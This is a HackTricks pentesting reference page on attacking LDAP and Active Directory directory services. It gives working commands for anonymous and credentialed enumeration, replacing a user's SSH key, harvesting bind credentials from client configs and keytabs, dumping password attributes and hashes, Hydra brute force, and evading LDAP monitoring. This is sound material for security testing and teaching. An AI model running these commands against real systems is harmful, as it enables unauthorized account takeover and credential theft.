pentesting-ldap.md (22365B)
1 --- 2 title: "389, 636, 3268, 3269 - Pentesting LDAP" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-ldap.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-ldap.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 389, 636, 3268, 3269 - Pentesting LDAP 14 15 **LDAP** (Lightweight Directory Access Protocol) provides access to directory services: clients can search, read, add, modify, and delete directory entries when access controls permit it. Common deployments store identities, groups, devices, and service configuration. LDAP was designed as a lighter-weight way to access directory models derived from X.500.<sup>[[6]](#references)[[7]](#references)</sup> 16 17 An LDAP server is also called a Directory System Agent (DSA). A directory can be partitioned into naming contexts and distributed or replicated across DSAs, but not every server necessarily contains a synchronized copy of the entire tree. A DSA may return referrals when another server holds the requested data.<sup>[[6]](#references)[[7]](#references)</sup> 18 19 Entries form a **Directory Information Tree (DIT)** and are identified by Distinguished Names (DNs). A deployment may use DNS-style domain components (`dc=example,dc=com`), country/organization components, organizational units, or another schema-appropriate hierarchy; there is no requirement that every tree follow a country → organization pattern.<sup>[[6]](#references)</sup> 20 21 **Common ports:** TCP 389 for LDAP (optionally upgraded with StartTLS) and TCP 636 for LDAP over TLS (`ldaps`). On an Active Directory domain controller that is also a Global Catalog server, TCP 3268 provides Global Catalog LDAP and TCP 3269 provides Global Catalog LDAP over TLS.<sup>[[8]](#references)</sup> 22 23 ```text 24 PORT STATE SERVICE REASON 25 389/tcp open ldap syn-ack 26 636/tcp open tcpwrapped 27 ``` 28 29 ### LDAP Data Interchange Format 30 31 LDIF (LDAP Data Interchange Format) defines the directory content as a set of records. It can also represent update requests (Add, Modify, Delete, Rename). 32 33 ```bash 34 dn: dc=local 35 dc: local 36 objectClass: dcObject 37 38 dn: dc=moneycorp,dc=local 39 dc: moneycorp 40 objectClass: dcObject 41 objectClass: organization 42 43 dn: ou=it,dc=moneycorp,dc=local 44 objectClass: organizationalUnit 45 ou: it 46 47 dn: ou=marketing,dc=moneycorp,dc=local 48 objectClass: organizationalUnit 49 ou: marketing 50 51 dn: uid=pepe,ou=it,dc=moneycorp,dc=local 52 objectClass: inetOrgPerson 53 cn: Pepe Example 54 sn: Example 55 givenName: Pepe 56 uid: pepe 57 mail: pepe@hacktricks.xyz 58 telephoneNumber: 23627387495 59 ``` 60 61 - Lines 1-3 define the top level domain local 62 - Lines 5-8 define the first level domain moneycorp (moneycorp.local) 63 - Lines 10-16 define two organizational units: `it` and `marketing`. 64 - The final record creates a person entry and assigns schema-valid attributes. 65 66 ## Write data 67 68 Writable attributes can have security impact beyond the directory itself. For example, if a host is explicitly configured to retrieve SSH authorized keys from LDAP and you can replace a target's `sshPublicKey` attribute, you may be able to authenticate as that user without their password. Confirm the SSH integration and attribute mapping; the mere presence of the attribute does not prove that any host consumes it.<sup>[[1]](#references)</sup> 69 70 ```bash 71 # Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/ 72 >>> import ldap3 73 >>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True) 74 >>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True) 75 >>> connection.bind() 76 True 77 >>> connection.extend.standard.who_am_i() 78 u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN' 79 >>> connection.modify('uid=USER,ou=USERS,dc=DOMAIN,dc=TLD', {'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]}) 80 ``` 81 82 ## Linux client-side LDAP artifacts 83 84 On Linux hosts integrated with LDAP/AD, valuable secrets often live in the **client configuration**, not only on the LDAP server itself. 85 86 Common files: 87 88 ```bash 89 ls -l /etc/sssd/sssd.conf /etc/nslcd.conf /etc/ldap/ldap.conf /etc/krb5.conf 2>/dev/null 90 sed -n '1,120p' /etc/sssd/sssd.conf 2>/dev/null 91 sed -n '1,120p' /etc/nslcd.conf 2>/dev/null 92 ``` 93 94 High-value keys: 95 96 - **`ldap_uri`** and **`ldap_search_base`**: where and what to query 97 - **`ldap_default_bind_dn`** and **`ldap_default_authtok`**: reusable bind credentials 98 - **`id_provider`** / **`auth_provider`**: tells you whether SSSD is using LDAP, Kerberos, or both 99 100 Useful follow-up: 101 102 ```bash 103 grep -nE '^(ldap_uri|ldap_search_base|ldap_default_bind_dn|ldap_default_authtok|id_provider|auth_provider)\\s*=' \ 104 /etc/sssd/sssd.conf /etc/nslcd.conf 2>/dev/null 105 106 ldapsearch -x -H ldap://<target> -D "<bind-dn>" -w '<password>' -b "<base-dn>" 107 ``` 108 109 What to look for: 110 111 - **world-readable `sssd.conf` / `nslcd.conf`** 112 - cleartext bind credentials 113 - directory-backed SSH or sudo integrations that turn a readable config into real authz impact 114 115 ## Cleartext credentials and TLS downgrade risks 116 117 An LDAP **simple bind** over an unprotected connection exposes the bind DN and password to an on-path observer. Not every authentication mechanism is plaintext: SASL mechanisms may provide their own integrity/confidentiality, and StartTLS or `ldaps://` can protect the session.<sup>[[9]](#references)</sup> 118 119 An on-path attacker may be able to suppress or interfere with StartTLS when a client treats TLS as optional and falls back to an unprotected simple bind. A correctly configured client must require TLS before sending credentials and fail closed if negotiation fails. 120 121 For `ldaps://` or successfully negotiated StartTLS, interception additionally requires the client to accept an untrusted or name-mismatched certificate, or compromise of a trusted CA/key. LDAP clients are often unattended services, so certificate validation policy—not an interactive user prompt—is the relevant control.<sup>[[10]](#references)</sup> 122 123 ## Anonymous Access 124 125 ### Bypass TLS SNI check 126 127 In the cited environment, resolving an attacker-chosen hostname to the LDAP service changed how the TLS connection was accepted and made an anonymously readable directory reachable. Treat this as a deployment-specific hostname/SNI and certificate-routing check, not a generic LDAP authentication bypass:<sup>[[2]](#references)</sup> 128 129 ```bash 130 ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" + 131 ``` 132 133 ### LDAP anonymous binds 134 135 An LDAP anonymous bind establishes an unauthenticated authorization state. Active Directory allows limited RootDSE discovery anonymously but, since Windows Server 2003 defaults, generally requires authentication to search directory data. Administrators can deliberately grant broader anonymous access for legacy applications; a mistaken ACL can then expose users, groups, computers, attributes, or policy data.<sup>[[3]](#references)</sup> 136 137 ### Anonymous LDAP enumeration with NetExec (null bind) 138 139 If null/anonymous bind is allowed, you can pull users, groups, and attributes directly via NetExec’s LDAP module without creds.<sup>[[4]](#references)[[5]](#references)</sup> Useful filters: 140 - (objectClass=*) to inventory objects under a base DN 141 - (sAMAccountName=*) to harvest user principals 142 143 Examples: 144 145 ```bash 146 # Enumerate objects from the root DSE (base DN autodetected) 147 netexec ldap <DC_FQDN> -u '' -p '' --query "(objectClass=*)" "" 148 149 # Dump users with key attributes for spraying and targeting 150 netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" "" 151 152 # Extract just the sAMAccountName field into a list 153 netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" "" \ 154 | awk -F': ' '/sAMAccountName:/ {print $2}' | sort -u > users.txt 155 ``` 156 157 What to look for: 158 - sAMAccountName, userPrincipalName 159 - memberOf and OU placement to scope targeted sprays 160 - pwdLastSet (temporal patterns), userAccountControl flags (disabled, smartcard required, etc.) 161 162 Note: When the requested anonymous search is not permitted, an Operations error indicating that a bind is required is common. Other errors can reflect the base DN, filter, signing/channel-binding policy, or server-specific access controls. 163 164 ## Valid Credentials 165 166 If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using: 167 168 [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) 169 170 ```bash 171 pip3 install ldapdomaindump 172 ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir] 173 ``` 174 175 ### [Brute Force](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#ldap) 176 177 ## Enumeration 178 179 ### Automated 180 181 These scripts may reveal anonymously accessible metadata such as naming contexts and supported controls: 182 183 ```bash 184 nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials 185 ``` 186 187 ### Python 188 189 <details> 190 191 <summary>See LDAP enumeration with python</summary> 192 193 You can enumerate an LDAP directory with or without credentials using Python: `pip3 install ldap3`. 194 195 First try to **connect without** credentials: 196 197 ```bash 198 >>> import ldap3 199 >>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True) 200 >>> connection = ldap3.Connection(server) 201 >>> connection.bind() 202 True 203 >>> server.info 204 ``` 205 206 If the bind returns `True`, inspect RootDSE metadata such as naming contexts and supported features. A successful anonymous bind does not imply that subtree searches are authorized. 207 208 ```bash 209 >>> server.info 210 DSA info (from DSE): 211 Supported LDAP versions: 3 212 Naming contexts: 213 dc=DOMAIN,dc=DOMAIN 214 ``` 215 216 Once you have a naming context, this subtree query requests all objects the bound identity is allowed to read: 217 218 ```bash 219 >>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') 220 True 221 >> connection.entries 222 ``` 223 224 Or **dump** the whole ldap: 225 226 ```bash 227 >> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword') 228 True 229 >>> connection.entries 230 ``` 231 232 </details> 233 234 ### windapsearch 235 236 [**Windapsearch**](https://github.com/ropnop/windapsearch) is a Python script useful to **enumerate users, groups, and computers from a Windows** domain by utilizing LDAP queries. 237 238 ```bash 239 # Get computers 240 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers 241 # Get groups 242 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups 243 # Get users 244 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --users 245 # Get Domain Admins 246 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da 247 # Get Privileged Users 248 python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users 249 ``` 250 251 ### ldapsearch 252 253 Check null credentials or if your credentials are valid: 254 255 ```bash 256 ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>" 257 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>" 258 ``` 259 260 ```bash 261 # CREDENTIALS NOT VALID RESPONSE 262 search: 2 263 result: 1 Operations error 264 text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera 265 tion a successful bind must be completed on the connection., data 0, v3839 266 ``` 267 268 An error saying that a successful bind must be completed means the requested operation is not permitted in the current authentication state. Possible causes include invalid credentials, an anonymous/omitted bind, or a server policy requiring signing, channel binding, or a different authentication mechanism. 269 270 You can extract **everything from a domain** using: 271 272 ```bash 273 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>" 274 -x Simple Authentication 275 -H LDAP Server 276 -D My User 277 -w My password 278 -b Base site, all data from here will be given 279 ``` 280 281 Extract **users**: 282 283 ```bash 284 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" 285 #Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local" 286 ``` 287 288 Extract **computers**: 289 290 ```bash 291 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>" 292 ``` 293 294 Extract **my info**: 295 296 ```bash 297 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" 298 ``` 299 300 Extract **Domain Admins**: 301 302 ```bash 303 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" 304 ``` 305 306 Extract **Domain Users**: 307 308 ```bash 309 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" 310 ``` 311 312 Extract **Enterprise Admins**: 313 314 ```bash 315 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" 316 ``` 317 318 Extract **Administrators**: 319 320 ```bash 321 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>" 322 ``` 323 324 Extract **Remote Desktop Group**: 325 326 ```bash 327 ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>" 328 ``` 329 330 To see if you have access to any password you can use grep after executing one of the queries: 331 332 ```bash 333 <ldapsearchcmd...> | grep -i -A2 -B2 "userpas" 334 ``` 335 336 Values in password-like attributes may be hashes, application-specific secrets, stale data, or decoys rather than current plaintext passwords. 337 338 #### pbis 339 340 You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) and it's usually installed in `/opt/pbis`.\ 341 **PBIS Open** is now an archived project, but it may still be installed on older LDAP/AD-integrated hosts. Its utilities can expose useful local integration information: 342 343 ```bash 344 #Read keytab file 345 ./klist -k /etc/krb5.keytab 346 347 #Get known domains info 348 ./get-status 349 ./lsa get-status 350 351 #Get basic metrics 352 ./get-metrics 353 ./lsa get-metrics 354 355 #Get users 356 ./enum-users 357 ./lsa enum-users 358 359 #Get groups 360 ./enum-groups 361 ./lsa enum-groups 362 363 #Get all kind of objects 364 ./enum-objects 365 ./lsa enum-objects 366 367 #Get groups of a user 368 ./list-groups-for-user <username> 369 ./lsa list-groups-for-user <username> 370 #Get groups of each user 371 ./enum-users | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done 372 373 #Get users of a group 374 ./enum-members --by-name "domain admins" 375 ./lsa enum-members --by-name "domain admins" 376 #Get users of each group 377 ./enum-groups | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done 378 379 #Get description of each user 380 ./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do 381 echo "$line"; 382 ./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description"; 383 echo "======================" 384 done 385 ``` 386 387 ## Graphical Interface 388 389 ### Apache Directory 390 391 [**Download Apache Directory from here**](https://directory.apache.org/studio/download/download-linux.html). You can find an [example of how to use this tool here](https://www.youtube.com/watch?v=VofMBg2VLnw&t=3840s). 392 393 ### jxplorer 394 395 You can download a graphical interface with LDAP server here: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html) 396 397 By default it may be installed in `/opt/jxplorer`. 398 399  400 401 ### Godap 402 403 Godap is an interactive terminal user interface for LDAP that can be used to interact with objects and attributes in AD and other LDAP servers. It is available for Windows, Linux and MacOS and supports simple binds, pass-the-hash, pass-the-ticket & pass-the-cert, along with several other specialized features such as searching/creating/changing/deleting objects, adding/removing users from groups, changing passwords, editing object permissions (DACLs), modifying Active-Directory Integrated DNS (ADIDNS), exporting to JSON files, etc. 404 405  406 407 You can access it in [https://github.com/Macmod/godap](https://github.com/Macmod/godap). For usage examples and instructions read the [Wiki](https://github.com/Macmod/godap/wiki). 408 409 ### Ldapx 410 411 Ldapx is a flexible LDAP proxy that can be used to inspect & transform LDAP traffic from other tools. It can be used to obfuscate LDAP traffic to attempt to bypass identity protection & LDAP monitoring tools and implements most of the methods presented in the [MaLDAPtive](https://www.youtube.com/watch?v=mKRS5Iyy7Qo) talk. 412 413  414 415 You can get it from [https://github.com/Macmod/ldapx](https://github.com/Macmod/ldapx). 416 417 ## Authentication via Kerberos 418 419 With a valid Kerberos credential cache and correct service principal/DNS setup, `ldapsearch -Y GSSAPI` uses SASL GSSAPI rather than a simple bind. Whether another invocation uses NTLM depends on the LDAP library and SASL mechanism; `ldapsearch -x` specifically requests simple authentication. 420 421 ## Post-exploitation 422 423 Legacy OpenLDAP deployments may store Berkeley DB files under `/var/lib/ldap`. If the exact backend uses readable `.bdb` files, this historical string-carving approach may recover password-hash records, but modern `mdb` backends and binary database formats require backend-aware offline tooling or a consistent backup: 424 425 ```bash 426 cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u 427 ``` 428 429 Extract only the hash value (for example, the string beginning with `{SSHA}`) and select the matching John the Ripper/Hashcat format. Do not append adjacent LDIF or database fields such as `structuralObjectClass`. 430 431 ### Configuration Files 432 433 - General 434 - containers.ldif 435 - ldap.cfg 436 - ldap.conf 437 - ldap.xml 438 - ldap-config.xml 439 - ldap-realm.xml 440 - slapd.conf 441 - IBM SecureWay V3 server 442 - V3.sas.oc 443 - Microsoft Active Directory server 444 - msadClassesAttrs.ldif 445 - Netscape Directory Server 4 446 - nsslapd.sas_at.conf 447 - nsslapd.sas_oc.conf 448 - OpenLDAP directory server 449 - slapd.sas_at.conf 450 - slapd.sas_oc.conf 451 - Sun ONE Directory Server 5.1 452 - 75sas.ldif 453 454 ## HackTricks Automatic Commands 455 456 ```text 457 Protocol_Name: LDAP #Protocol Abbreviation if there is one. 458 Port_Number: 389,636 #Comma separated if there is more than one. 459 Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out 460 461 Entry_1: 462 Name: Notes 463 Description: Notes for LDAP 464 Note: | 465 The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint. 466 467 https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-ldap.html 468 469 Entry_2: 470 Name: Banner Grab 471 Description: Grab LDAP Banner 472 Command: nmap -p 389 --script ldap-search -Pn {IP} 473 474 Entry_3: 475 Name: LdapSearch 476 Description: Base LdapSearch 477 Command: ldapsearch -H ldap://{IP} -x 478 479 Entry_4: 480 Name: LdapSearch Naming Context Dump 481 Description: Attempt to get LDAP Naming Context 482 Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts 483 484 Entry_5: 485 Name: LdapSearch Big Dump 486 Description: Need Naming Context to do big dump 487 Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}" 488 489 Entry_6: 490 Name: Hydra Brute Force 491 Description: Need User 492 Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f 493 494 Entry_7: 495 Name: Netexec LDAP BloodHound 496 Command: nxc ldap <IP> -u <USERNAME> -p <PASSWORD> --bloodhound -c All -d <DOMAIN.LOCAL> --dns-server <IP> --dns-tcp 497 ``` 498 499 ## References 500 501 - [1] [Exploiting LDAP Server NULL Bind](https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/) 502 - [2] [Exploiting Arbitrary Object Instantiations in PHP without Custom Classes](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) 503 - [3] [Microsoft: Anonymous LDAP operations to Active Directory are disabled](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) 504 - [4] [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html) 505 - [5] [NetExec (CME successor)](https://github.com/Pennyw0rth/NetExec) 506 - [6] [RFC 4512 – LDAP Directory Information Models](https://www.rfc-editor.org/rfc/rfc4512) 507 - [7] [RFC 4511 – LDAP protocol operations](https://www.rfc-editor.org/rfc/rfc4511) 508 - [8] [Microsoft Active Directory LDAP and Global Catalog ports](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1010e59a-cf64-410c-a05c-a3a6c715261a) 509 - [9] [RFC 4513 – LDAP authentication methods and security mechanisms](https://www.rfc-editor.org/rfc/rfc4513) 510 - [10] [OpenLDAP 2.6 Administrator's Guide – Using TLS](https://openldap.org/doc/admin26/tls.html)